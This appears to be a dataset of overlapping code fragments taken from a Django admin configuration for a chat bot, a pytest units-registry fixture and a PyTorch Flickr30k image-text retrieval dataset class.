"queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload botbot-bot configuration\" class ChannelForm(forms.ModelForm): class",
"so skips REFRESH actions = None def usage(self, obj): return \"%d%%\" % (",
"class ChannelForm(forms.ModelForm): class Meta: model = models.Channel exclude = [] def clean_private_slug(self): return",
"django import forms from django.conf import settings from django.contrib import admin from django.forms.models",
"= [botbot_refresh] class PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request): return False def get_queryset(self, request): qs",
"\"\"\"Django admin configuration for the bot objects. \"\"\" import redis from django import",
"= ('__unicode__', 'is_active', 'usage') list_editable = ('is_active',) list_filter = ('is_active',) readonly_fields = ('server_identifier',)",
"call delete, so skips REFRESH actions = None def usage(self, obj): return \"%d%%\"",
"* 100) def botbot_refresh(modeladmin, request, queryset): \"\"\" Ask daemon to reload configuration \"\"\"",
"actions = [botbot_refresh] class PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request): return False def get_queryset(self, request):",
"usage(self, obj): return \"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100) def botbot_refresh(modeladmin,",
"from django.conf import settings from django.contrib import admin from django.forms.models import BaseInlineFormSet from",
"ChannelForm list_display = ('name', 'chatbot', 'status', 'is_featured', 'created', 'updated') list_filter = ('status', 'is_featured',",
"'is_featured', 'created', 'updated') list_filter = ('status', 'is_featured', 'is_public', 'chatbot') prepopulated_fields = { 'slug':",
"= ('name', 'chatbot__server') inlines = [ActivePluginInline] actions = [botbot_refresh] class PublicChannelApproval(ChannelAdmin): def has_add_permission(self,",
"reload configuration \"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload botbot-bot configuration\"",
"def __init__(self, *args, **kwargs): super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through formset",
"'chatbot', 'status', 'is_featured', 'created', 'updated') list_filter = ('status', 'is_featured', 'is_public', 'chatbot') prepopulated_fields =",
"clean_private_slug(self): return self.cleaned_data['private_slug'] or None class ChannelAdmin(admin.ModelAdmin): form = ChannelForm list_display = ('name',",
"return \"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100) def botbot_refresh(modeladmin, request, queryset):",
"is_public=True) class PublicChannels(models.Channel): class Meta: proxy = True verbose_name = \"Pending Public Channel\"",
"Disable bulk delete, because it doesn't call delete, so skips REFRESH actions =",
"from django.forms.models import BaseInlineFormSet from . import models class PluginFormset(BaseInlineFormSet): def __init__(self, *args,",
"def get_extra(self, request, obj=None, **kwargs): return 0 class ChatBotAdmin(admin.ModelAdmin): exclude = ('connection', 'server_identifier')",
"Meta: model = models.Channel exclude = [] def clean_private_slug(self): return self.cleaned_data['private_slug'] or None",
"redis from django import forms from django.conf import settings from django.contrib import admin",
"django.forms.models import BaseInlineFormSet from . import models class PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs):",
"= ('connection', 'server_identifier') list_display = ('__unicode__', 'is_active', 'usage') list_editable = ('is_active',) list_filter =",
"models class PluginFormset(BaseInlineFormSet): def __init__(self, *args, **kwargs): super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model",
"= [ActivePluginInline] actions = [botbot_refresh] class PublicChannelApproval(ChannelAdmin): def has_add_permission(self, request): return False def",
"return qs.filter(status=self.model.ACTIVE, is_public=True) class PublicChannels(models.Channel): class Meta: proxy = True verbose_name = \"Pending",
"\"%d%%\" % ( (obj.channel_set.filter(status=models.Channel.ACTIVE).count() / float(obj.max_channels)) * 100) def botbot_refresh(modeladmin, request, queryset): \"\"\"",
"daemon to reload configuration \"\"\" queue = redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload",
"= redis.from_url(settings.REDIS_PLUGIN_QUEUE_URL) queue.lpush('bot', 'REFRESH') botbot_refresh.short_description = \"Reload botbot-bot configuration\" class ChannelForm(forms.ModelForm): class Meta:",
"'created', 'updated') search_fields = ('name', 'chatbot__server') inlines = [ActivePluginInline] actions = [botbot_refresh] class",
"super(PluginFormset, self).__init__(*args, **kwargs) class ActivePluginInline(admin.StackedInline): model = models.Channel.plugins.through formset = PluginFormset def get_extra(self,",
"= { 'slug': ('name',) } list_editable = ('chatbot','status',) readonly_fields = ('fingerprint', 'created', 'updated')",
"import admin from django.forms.models import BaseInlineFormSet from . import models class PluginFormset(BaseInlineFormSet): def"
] |
[
"pint import pytest @pytest.fixture(scope=\"session\") def ureg(): \"\"\"Application-wide units registry.\"\"\" registry = pint.get_application_registry() #",
"ureg(): \"\"\"Application-wide units registry.\"\"\" registry = pint.get_application_registry() # Used by .compat.ixmp, .compat.pyam registry.define(\"USD",
"import pint import pytest @pytest.fixture(scope=\"session\") def ureg(): \"\"\"Application-wide units registry.\"\"\" registry = pint.get_application_registry()",
"@pytest.fixture(scope=\"session\") def ureg(): \"\"\"Application-wide units registry.\"\"\" registry = pint.get_application_registry() # Used by .compat.ixmp,",
"pytest @pytest.fixture(scope=\"session\") def ureg(): \"\"\"Application-wide units registry.\"\"\" registry = pint.get_application_registry() # Used by",
"\"\"\"Application-wide units registry.\"\"\" registry = pint.get_application_registry() # Used by .compat.ixmp, .compat.pyam registry.define(\"USD =",
"pint.get_application_registry() # Used by .compat.ixmp, .compat.pyam registry.define(\"USD = [USD]\") registry.define(\"case = [case]\") yield",
"import pytest @pytest.fixture(scope=\"session\") def ureg(): \"\"\"Application-wide units registry.\"\"\" registry = pint.get_application_registry() # Used",
"= pint.get_application_registry() # Used by .compat.ixmp, .compat.pyam registry.define(\"USD = [USD]\") registry.define(\"case = [case]\")",
"registry.\"\"\" registry = pint.get_application_registry() # Used by .compat.ixmp, .compat.pyam registry.define(\"USD = [USD]\") registry.define(\"case",
"units registry.\"\"\" registry = pint.get_application_registry() # Used by .compat.ixmp, .compat.pyam registry.define(\"USD = [USD]\")",
"# Used by .compat.ixmp, .compat.pyam registry.define(\"USD = [USD]\") registry.define(\"case = [case]\") yield registry",
"registry = pint.get_application_registry() # Used by .compat.ixmp, .compat.pyam registry.define(\"USD = [USD]\") registry.define(\"case =",
"def ureg(): \"\"\"Application-wide units registry.\"\"\" registry = pint.get_application_registry() # Used by .compat.ixmp, .compat.pyam"
] |
[
"image_id = entry[\"image_id\"] while True: # sample a random image: img_id2 = random.choice(self.image_id_list)",
"True: # sample a random image: img_id4 = random.choice(self.image_id_list) if img_id4 != image_id:",
"hard_neg_file_path): super().__init__() self._dataset_type = dataset_type self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path) self._metadata = {} @property def",
"entries self.imgid2entry = imgid2entry self.image_id_list = [*self.imgid2entry] if self._dataset_type == \"train\": with open(hard_neg_file_path,",
"affiliates. # This source code is licensed under the MIT license found in",
"for key, value in image_info.items(): setattr(self, key, value) self.train_imgId2pool = { imageId: i",
"if self._dataset_type != \"train\": self.imgs.append(image_id) if self._dataset_type == \"train\" and int(image_id) in remove_ids:",
"and its affiliates. # This source code is licensed under the MIT license",
"self.imgs.append(image_id) if self._dataset_type == \"train\" and int(image_id) in remove_ids: continue imgid2entry[image_id] = []",
"int(image_id) in remove_ids: continue imgid2entry[image_id] = [] for sentences in annotation[\"sentences\"]: entries.append({\"caption\": sentences,",
"root directory of this source tree. import jsonlines import torch import random import",
"self._entries = entries self.imgid2entry = imgid2entry self.image_id_list = [*self.imgid2entry] if self._dataset_type == \"train\":",
"the root directory of this source tree. import jsonlines import torch import random",
"of this source tree. import jsonlines import torch import random import numpy as",
"{} count = 0 remove_ids = [] if test_id_path: remove_ids = np.load(test_id_path) remove_ids",
"def __len__(self): return self.db_size def __getitem__(self, idx): entry = self._entries[idx] if self._dataset_type !=",
"= { imageId: i for i, imageId in enumerate(self.train_image_list) } self.db_size = len(self._entries)",
"if img_id3 != image_id: break entry3 = self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type == \"train\": #",
"= {} @property def metadata(self): return self._metadata @metadata.setter def metadata(self, x): self._metadata =",
"__getitem__(self, idx): entry = self._entries[idx] if self._dataset_type != \"train\": return entry, self.imgs image_id",
"True: # sample a random image: img_id3 = random.choice(self.image_id_list) if img_id3 != image_id:",
"\"image_id\": image_id}) imgid2entry[image_id].append(count) count += 1 self._entries = entries self.imgid2entry = imgid2entry self.image_id_list",
"self._entries[random.choice(self.imgid2entry[img_id2])] # random image wrong while True: # sample a random image: img_id3",
"[] for sentences in annotation[\"sentences\"]: entries.append({\"caption\": sentences, \"image_id\": image_id}) imgid2entry[image_id].append(count) count += 1",
"entries = [] imgid2entry = {} count = 0 remove_ids = [] if",
"pool_img_idx = int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] ) img_id4 = self.train_image_list[pool_img_idx] else: while True: #",
"import torch import random import numpy as np import _pickle as cPickle class",
"image_info = cPickle.load(f) for key, value in image_info.items(): setattr(self, key, value) self.train_imgId2pool =",
"= [] for sentences in annotation[\"sentences\"]: entries.append({\"caption\": sentences, \"image_id\": image_id}) imgid2entry[image_id].append(count) count +=",
"!= image_id: break entry3 = self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type == \"train\": # random hard",
"value) self.train_imgId2pool = { imageId: i for i, imageId in enumerate(self.train_image_list) } self.db_size",
"== \"train\" and int(image_id) in remove_ids: continue imgid2entry[image_id] = [] for sentences in",
"image_id}) imgid2entry[image_id].append(count) count += 1 self._entries = entries self.imgid2entry = imgid2entry self.image_id_list =",
"== \"train\": with open(hard_neg_file_path, \"rb\") as f: image_info = cPickle.load(f) for key, value",
"!= image_id: break entry2 = self._entries[random.choice(self.imgid2entry[img_id2])] # random image wrong while True: #",
"This source code is licensed under the MIT license found in the #",
"wrong while True: # sample a random image: img_id3 = random.choice(self.image_id_list) if img_id3",
"torch import random import numpy as np import _pickle as cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset):",
"with jsonlines.open(imdb_path) as reader: # Build an index which maps image id with",
"hard_neg_file_path) self._metadata = {} @property def metadata(self): return self._metadata @metadata.setter def metadata(self, x):",
"entry = self._entries[idx] if self._dataset_type != \"train\": return entry, self.imgs image_id = entry[\"image_id\"]",
"np.load(test_id_path) remove_ids = [int(x) for x in remove_ids] for annotation in reader: image_id",
"tree. import jsonlines import torch import random import numpy as np import _pickle",
"\"train\" and int(image_id) in remove_ids: continue imgid2entry[image_id] = [] for sentences in annotation[\"sentences\"]:",
"if img_id2 != image_id: break entry2 = self._entries[random.choice(self.imgid2entry[img_id2])] # random image wrong while",
"random image wrong while True: # sample a random image: img_id3 = random.choice(self.image_id_list)",
"continue imgid2entry[image_id] = [] for sentences in annotation[\"sentences\"]: entries.append({\"caption\": sentences, \"image_id\": image_id}) imgid2entry[image_id].append(count)",
"license found in the # LICENSE file in the root directory of this",
"[*self.imgid2entry] if self._dataset_type == \"train\": with open(hard_neg_file_path, \"rb\") as f: image_info = cPickle.load(f)",
"= self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx = int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] ) img_id4 = self.train_image_list[pool_img_idx] else: while",
"super().__init__() self._dataset_type = dataset_type self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path) self._metadata = {} @property def metadata(self):",
"imgid2entry = {} count = 0 remove_ids = [] if test_id_path: remove_ids =",
"caption. rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx = int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] ) img_id4 = self.train_image_list[pool_img_idx]",
"if img_id4 != image_id: break entry4 = self._entries[random.choice(self.imgid2entry[img_id4])] return [entry, entry2, entry3, entry4]",
"maps image id with a list of caption annotations. entries = [] imgid2entry",
"sample a random image: img_id4 = random.choice(self.image_id_list) if img_id4 != image_id: break entry4",
"{ imageId: i for i, imageId in enumerate(self.train_image_list) } self.db_size = len(self._entries) def",
"def metadata(self, x): self._metadata = x def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path): if self._dataset_type",
"count = 0 remove_ids = [] if test_id_path: remove_ids = np.load(test_id_path) remove_ids =",
"= self._entries[idx] if self._dataset_type != \"train\": return entry, self.imgs image_id = entry[\"image_id\"] while",
"for x in remove_ids] for annotation in reader: image_id = int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type",
"test_id_path, hard_neg_file_path): if self._dataset_type != \"train\": self.imgs = [] with jsonlines.open(imdb_path) as reader:",
"return self.db_size def __getitem__(self, idx): entry = self._entries[idx] if self._dataset_type != \"train\": return",
"random.choice(self.image_id_list) if img_id3 != image_id: break entry3 = self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type == \"train\":",
"= random.choice(self.image_id_list) if img_id4 != image_id: break entry4 = self._entries[random.choice(self.imgid2entry[img_id4])] return [entry, entry2,",
"in remove_ids: continue imgid2entry[image_id] = [] for sentences in annotation[\"sentences\"]: entries.append({\"caption\": sentences, \"image_id\":",
"sample a random image: img_id3 = random.choice(self.image_id_list) if img_id3 != image_id: break entry3",
"self._dataset_type == \"train\" and int(image_id) in remove_ids: continue imgid2entry[image_id] = [] for sentences",
"its affiliates. # This source code is licensed under the MIT license found",
"image: img_id4 = random.choice(self.image_id_list) if img_id4 != image_id: break entry4 = self._entries[random.choice(self.imgid2entry[img_id4])] return",
"found in the # LICENSE file in the root directory of this source",
"= entries self.imgid2entry = imgid2entry self.image_id_list = [*self.imgid2entry] if self._dataset_type == \"train\": with",
"!= \"train\": self.imgs.append(image_id) if self._dataset_type == \"train\" and int(image_id) in remove_ids: continue imgid2entry[image_id]",
"if self._dataset_type != \"train\": self.imgs = [] with jsonlines.open(imdb_path) as reader: # Build",
"Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed",
"dataset_type, test_id_file_path, hard_neg_file_path): super().__init__() self._dataset_type = dataset_type self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path) self._metadata = {}",
"Build an index which maps image id with a list of caption annotations.",
"def __getitem__(self, idx): entry = self._entries[idx] if self._dataset_type != \"train\": return entry, self.imgs",
"= random.choice(self.image_id_list) if img_id3 != image_id: break entry3 = self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type ==",
"# Copyright (c) Facebook, Inc. and its affiliates. # This source code is",
"import random import numpy as np import _pickle as cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def",
"self._metadata @metadata.setter def metadata(self, x): self._metadata = x def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path):",
"in image_info.items(): setattr(self, key, value) self.train_imgId2pool = { imageId: i for i, imageId",
"licensed under the MIT license found in the # LICENSE file in the",
"= [] if test_id_path: remove_ids = np.load(test_id_path) remove_ids = [int(x) for x in",
"i, imageId in enumerate(self.train_image_list) } self.db_size = len(self._entries) def __len__(self): return self.db_size def",
"for annotation in reader: image_id = int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type != \"train\": self.imgs.append(image_id) if",
") img_id4 = self.train_image_list[pool_img_idx] else: while True: # sample a random image: img_id4",
"enumerate(self.train_image_list) } self.db_size = len(self._entries) def __len__(self): return self.db_size def __getitem__(self, idx): entry",
"random import numpy as np import _pickle as cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self,",
"True: # sample a random image: img_id2 = random.choice(self.image_id_list) if img_id2 != image_id:",
"= {} count = 0 remove_ids = [] if test_id_path: remove_ids = np.load(test_id_path)",
"reader: image_id = int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type != \"train\": self.imgs.append(image_id) if self._dataset_type == \"train\"",
"self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx = int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] ) img_id4 = self.train_image_list[pool_img_idx] else: while True:",
"= [*self.imgid2entry] if self._dataset_type == \"train\": with open(hard_neg_file_path, \"rb\") as f: image_info =",
"cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path): super().__init__() self._dataset_type = dataset_type",
"reader: # Build an index which maps image id with a list of",
"sentences in annotation[\"sentences\"]: entries.append({\"caption\": sentences, \"image_id\": image_id}) imgid2entry[image_id].append(count) count += 1 self._entries =",
"entry3 = self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type == \"train\": # random hard caption. rand_img_id_pool =",
"image_id = int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type != \"train\": self.imgs.append(image_id) if self._dataset_type == \"train\" and",
"in remove_ids] for annotation in reader: image_id = int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type != \"train\":",
"= self.train_image_list[pool_img_idx] else: while True: # sample a random image: img_id4 = random.choice(self.image_id_list)",
"image_info.items(): setattr(self, key, value) self.train_imgId2pool = { imageId: i for i, imageId in",
"break entry3 = self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type == \"train\": # random hard caption. rand_img_id_pool",
"__len__(self): return self.db_size def __getitem__(self, idx): entry = self._entries[idx] if self._dataset_type != \"train\":",
"MIT license found in the # LICENSE file in the root directory of",
"[] with jsonlines.open(imdb_path) as reader: # Build an index which maps image id",
"\"rb\") as f: image_info = cPickle.load(f) for key, value in image_info.items(): setattr(self, key,",
"annotation[\"sentences\"]: entries.append({\"caption\": sentences, \"image_id\": image_id}) imgid2entry[image_id].append(count) count += 1 self._entries = entries self.imgid2entry",
"return entry, self.imgs image_id = entry[\"image_id\"] while True: # sample a random image:",
"= [] with jsonlines.open(imdb_path) as reader: # Build an index which maps image",
"random hard caption. rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx = int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] ) img_id4",
"directory of this source tree. import jsonlines import torch import random import numpy",
"with a list of caption annotations. entries = [] imgid2entry = {} count",
"count += 1 self._entries = entries self.imgid2entry = imgid2entry self.image_id_list = [*self.imgid2entry] if",
"@metadata.setter def metadata(self, x): self._metadata = x def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path): if",
"source tree. import jsonlines import torch import random import numpy as np import",
"self._dataset_type == \"train\": with open(hard_neg_file_path, \"rb\") as f: image_info = cPickle.load(f) for key,",
"img_id3 != image_id: break entry3 = self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type == \"train\": # random",
"test_id_file_path, hard_neg_file_path): super().__init__() self._dataset_type = dataset_type self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path) self._metadata = {} @property",
"hard_neg_file_path): if self._dataset_type != \"train\": self.imgs = [] with jsonlines.open(imdb_path) as reader: #",
"self._dataset_type != \"train\": self.imgs.append(image_id) if self._dataset_type == \"train\" and int(image_id) in remove_ids: continue",
"a random image: img_id2 = random.choice(self.image_id_list) if img_id2 != image_id: break entry2 =",
"{} @property def metadata(self): return self._metadata @metadata.setter def metadata(self, x): self._metadata = x",
"self._metadata = {} @property def metadata(self): return self._metadata @metadata.setter def metadata(self, x): self._metadata",
"entry[\"image_id\"] while True: # sample a random image: img_id2 = random.choice(self.image_id_list) if img_id2",
"= [] imgid2entry = {} count = 0 remove_ids = [] if test_id_path:",
"in annotation[\"sentences\"]: entries.append({\"caption\": sentences, \"image_id\": image_id}) imgid2entry[image_id].append(count) count += 1 self._entries = entries",
"image_id: break entry3 = self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type == \"train\": # random hard caption.",
"as cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path): super().__init__() self._dataset_type =",
"int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type != \"train\": self.imgs.append(image_id) if self._dataset_type == \"train\" and int(image_id) in",
"= self._entries[random.choice(self.imgid2entry[img_id2])] # random image wrong while True: # sample a random image:",
"img_id4 = self.train_image_list[pool_img_idx] else: while True: # sample a random image: img_id4 =",
"__init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path): super().__init__() self._dataset_type = dataset_type self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path) self._metadata",
"in enumerate(self.train_image_list) } self.db_size = len(self._entries) def __len__(self): return self.db_size def __getitem__(self, idx):",
"self.db_size = len(self._entries) def __len__(self): return self.db_size def __getitem__(self, idx): entry = self._entries[idx]",
"# Build an index which maps image id with a list of caption",
"as np import _pickle as cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self, imdb_path, dataset_type, test_id_file_path,",
"= [int(x) for x in remove_ids] for annotation in reader: image_id = int(annotation[\"img_path\"].split(\".\")[0])",
"in the # LICENSE file in the root directory of this source tree.",
"class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path): super().__init__() self._dataset_type = dataset_type self._load_annotations(imdb_path,",
"caption annotations. entries = [] imgid2entry = {} count = 0 remove_ids =",
"_pickle as cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path): super().__init__() self._dataset_type",
"} self.db_size = len(self._entries) def __len__(self): return self.db_size def __getitem__(self, idx): entry =",
"# sample a random image: img_id2 = random.choice(self.image_id_list) if img_id2 != image_id: break",
"random.choice(self.image_id_list) if img_id2 != image_id: break entry2 = self._entries[random.choice(self.imgid2entry[img_id2])] # random image wrong",
"# sample a random image: img_id3 = random.choice(self.image_id_list) if img_id3 != image_id: break",
"self.imgs image_id = entry[\"image_id\"] while True: # sample a random image: img_id2 =",
"else: while True: # sample a random image: img_id4 = random.choice(self.image_id_list) if img_id4",
"which maps image id with a list of caption annotations. entries = []",
"= int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type != \"train\": self.imgs.append(image_id) if self._dataset_type == \"train\" and int(image_id)",
"remove_ids: continue imgid2entry[image_id] = [] for sentences in annotation[\"sentences\"]: entries.append({\"caption\": sentences, \"image_id\": image_id})",
"imdb_path, test_id_path, hard_neg_file_path): if self._dataset_type != \"train\": self.imgs = [] with jsonlines.open(imdb_path) as",
"test_id_file_path, hard_neg_file_path) self._metadata = {} @property def metadata(self): return self._metadata @metadata.setter def metadata(self,",
"open(hard_neg_file_path, \"rb\") as f: image_info = cPickle.load(f) for key, value in image_info.items(): setattr(self,",
"idx): entry = self._entries[idx] if self._dataset_type != \"train\": return entry, self.imgs image_id =",
"imgid2entry[image_id] = [] for sentences in annotation[\"sentences\"]: entries.append({\"caption\": sentences, \"image_id\": image_id}) imgid2entry[image_id].append(count) count",
"= cPickle.load(f) for key, value in image_info.items(): setattr(self, key, value) self.train_imgId2pool = {",
"random.choice(self.image_id_list) if img_id4 != image_id: break entry4 = self._entries[random.choice(self.imgid2entry[img_id4])] return [entry, entry2, entry3,",
"self.imgid2entry = imgid2entry self.image_id_list = [*self.imgid2entry] if self._dataset_type == \"train\": with open(hard_neg_file_path, \"rb\")",
"id with a list of caption annotations. entries = [] imgid2entry = {}",
"!= \"train\": return entry, self.imgs image_id = entry[\"image_id\"] while True: # sample a",
"sample a random image: img_id2 = random.choice(self.image_id_list) if img_id2 != image_id: break entry2",
"import _pickle as cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path): super().__init__()",
"_load_annotations(self, imdb_path, test_id_path, hard_neg_file_path): if self._dataset_type != \"train\": self.imgs = [] with jsonlines.open(imdb_path)",
"\"train\": self.imgs.append(image_id) if self._dataset_type == \"train\" and int(image_id) in remove_ids: continue imgid2entry[image_id] =",
"len(self._entries) def __len__(self): return self.db_size def __getitem__(self, idx): entry = self._entries[idx] if self._dataset_type",
"import jsonlines import torch import random import numpy as np import _pickle as",
"under the MIT license found in the # LICENSE file in the root",
"dataset_type self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path) self._metadata = {} @property def metadata(self): return self._metadata @metadata.setter",
"annotations. entries = [] imgid2entry = {} count = 0 remove_ids = []",
"a random image: img_id3 = random.choice(self.image_id_list) if img_id3 != image_id: break entry3 =",
"a random image: img_id4 = random.choice(self.image_id_list) if img_id4 != image_id: break entry4 =",
"img_id4 = random.choice(self.image_id_list) if img_id4 != image_id: break entry4 = self._entries[random.choice(self.imgid2entry[img_id4])] return [entry,",
"for sentences in annotation[\"sentences\"]: entries.append({\"caption\": sentences, \"image_id\": image_id}) imgid2entry[image_id].append(count) count += 1 self._entries",
"in reader: image_id = int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type != \"train\": self.imgs.append(image_id) if self._dataset_type ==",
"= x def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path): if self._dataset_type != \"train\": self.imgs =",
"\"train\": return entry, self.imgs image_id = entry[\"image_id\"] while True: # sample a random",
"self._metadata = x def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path): if self._dataset_type != \"train\": self.imgs",
"setattr(self, key, value) self.train_imgId2pool = { imageId: i for i, imageId in enumerate(self.train_image_list)",
"as reader: # Build an index which maps image id with a list",
"random image: img_id3 = random.choice(self.image_id_list) if img_id3 != image_id: break entry3 = self._entries[self.imgid2entry[img_id3][0]]",
"img_id3 = random.choice(self.image_id_list) if img_id3 != image_id: break entry3 = self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type",
"= np.load(test_id_path) remove_ids = [int(x) for x in remove_ids] for annotation in reader:",
"# sample a random image: img_id4 = random.choice(self.image_id_list) if img_id4 != image_id: break",
"x in remove_ids] for annotation in reader: image_id = int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type !=",
"(c) Facebook, Inc. and its affiliates. # This source code is licensed under",
"np import _pickle as cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self, imdb_path, dataset_type, test_id_file_path, hard_neg_file_path):",
"def metadata(self): return self._metadata @metadata.setter def metadata(self, x): self._metadata = x def _load_annotations(self,",
"if test_id_path: remove_ids = np.load(test_id_path) remove_ids = [int(x) for x in remove_ids] for",
"imgid2entry[image_id].append(count) count += 1 self._entries = entries self.imgid2entry = imgid2entry self.image_id_list = [*self.imgid2entry]",
"the MIT license found in the # LICENSE file in the root directory",
"= self._entries[self.imgid2entry[img_id3][0]] if self._dataset_type == \"train\": # random hard caption. rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]]",
"self.train_image_list[pool_img_idx] else: while True: # sample a random image: img_id4 = random.choice(self.image_id_list) if",
"imageId in enumerate(self.train_image_list) } self.db_size = len(self._entries) def __len__(self): return self.db_size def __getitem__(self,",
"len(rand_img_id_pool))] ) img_id4 = self.train_image_list[pool_img_idx] else: while True: # sample a random image:",
"image: img_id3 = random.choice(self.image_id_list) if img_id3 != image_id: break entry3 = self._entries[self.imgid2entry[img_id3][0]] if",
"self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path) self._metadata = {} @property def metadata(self): return self._metadata @metadata.setter def",
"image id with a list of caption annotations. entries = [] imgid2entry =",
"of caption annotations. entries = [] imgid2entry = {} count = 0 remove_ids",
"self._dataset_type = dataset_type self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path) self._metadata = {} @property def metadata(self): return",
"f: image_info = cPickle.load(f) for key, value in image_info.items(): setattr(self, key, value) self.train_imgId2pool",
"break entry2 = self._entries[random.choice(self.imgid2entry[img_id2])] # random image wrong while True: # sample a",
"self._dataset_type == \"train\": # random hard caption. rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx = int(",
"numpy as np import _pickle as cPickle class Flickr30kRetrievalDatabase(torch.utils.data.Dataset): def __init__(self, imdb_path, dataset_type,",
"jsonlines import torch import random import numpy as np import _pickle as cPickle",
"entry2 = self._entries[random.choice(self.imgid2entry[img_id2])] # random image wrong while True: # sample a random",
"!= \"train\": self.imgs = [] with jsonlines.open(imdb_path) as reader: # Build an index",
"this source tree. import jsonlines import torch import random import numpy as np",
"x def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path): if self._dataset_type != \"train\": self.imgs = []",
"return self._metadata @metadata.setter def metadata(self, x): self._metadata = x def _load_annotations(self, imdb_path, test_id_path,",
"self._dataset_type != \"train\": return entry, self.imgs image_id = entry[\"image_id\"] while True: # sample",
"entry, self.imgs image_id = entry[\"image_id\"] while True: # sample a random image: img_id2",
"imdb_path, dataset_type, test_id_file_path, hard_neg_file_path): super().__init__() self._dataset_type = dataset_type self._load_annotations(imdb_path, test_id_file_path, hard_neg_file_path) self._metadata =",
"code is licensed under the MIT license found in the # LICENSE file",
"with open(hard_neg_file_path, \"rb\") as f: image_info = cPickle.load(f) for key, value in image_info.items():",
"int( rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] ) img_id4 = self.train_image_list[pool_img_idx] else: while True: # sample a",
"x): self._metadata = x def _load_annotations(self, imdb_path, test_id_path, hard_neg_file_path): if self._dataset_type != \"train\":",
"# random image wrong while True: # sample a random image: img_id3 =",
"is licensed under the MIT license found in the # LICENSE file in",
"rand_img_id_pool[np.random.randint(1, len(rand_img_id_pool))] ) img_id4 = self.train_image_list[pool_img_idx] else: while True: # sample a random",
"[] if test_id_path: remove_ids = np.load(test_id_path) remove_ids = [int(x) for x in remove_ids]",
"if self._dataset_type == \"train\": # random hard caption. rand_img_id_pool = self.train_hard_pool[self.train_imgId2pool[image_id]] pool_img_idx =",
"test_id_path: remove_ids = np.load(test_id_path) remove_ids = [int(x) for x in remove_ids] for annotation",
"source code is licensed under the MIT license found in the # LICENSE",
"remove_ids] for annotation in reader: image_id = int(annotation[\"img_path\"].split(\".\")[0]) if self._dataset_type != \"train\": self.imgs.append(image_id)",
